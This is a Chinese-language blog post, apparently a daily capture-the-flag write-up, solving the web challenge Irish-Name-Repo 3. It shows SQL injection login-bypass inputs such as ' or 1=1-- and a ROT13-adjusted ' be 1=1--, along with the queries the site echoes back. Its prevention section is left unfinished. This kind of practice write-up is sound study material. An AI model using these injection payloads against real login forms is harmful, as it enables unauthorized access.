iT邦幫忙

2024 iThome 鐵人賽

DAY 26
0
佛心分享-刷題不只是刷題

CTF 刷題系列 第 26

CTF Day 26 Web(Irish-Name-Repo 3)

  • 分享至 

  • xImage
  •  

題目 Irish-Name-Repo 3

https://ithelp.ithome.com.tw/upload/images/20241013/20155574gBirKb1kvd.png
https://ithelp.ithome.com.tw/upload/images/20241013/20155574YhIXFnEqVi.png

輸入 12345 的結果
show 出 SQL query: SELECT * FROM admin where password = '12345’
https://ithelp.ithome.com.tw/upload/images/20241013/20155574zFkXXGj8NW.png

接者輸入 ‘ or 1=1--
出現 SQL query: SELECT * FROM admin where password = ''be 1=1--'
為什麼是 be?
https://ithelp.ithome.com.tw/upload/images/20241013/20155574ANWqmfYsgk.png

輸入隨便一個數 ' sd 1=1--
output SQL query: SELECT * FROM admin where password = ''fq 1=1—
sd —> fq
fq —> sd
https://ithelp.ithome.com.tw/upload/images/20241013/201555745X9XHQCmoo.png
https://ithelp.ithome.com.tw/upload/images/20241013/201555743DH0nw2bn7.png

那現在把 or 改成 be 輸入,就完事了
https://ithelp.ithome.com.tw/upload/images/20241013/201555747CSjqWkQLI.png

預防方法#3

待補待補待補待補待補待補待補待補待補待補


上一篇
CTF Day 25 Web(Irish-Name-Repo 2)
下一篇
CTF Day 27 Web(caas)
系列文
CTF 刷題30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言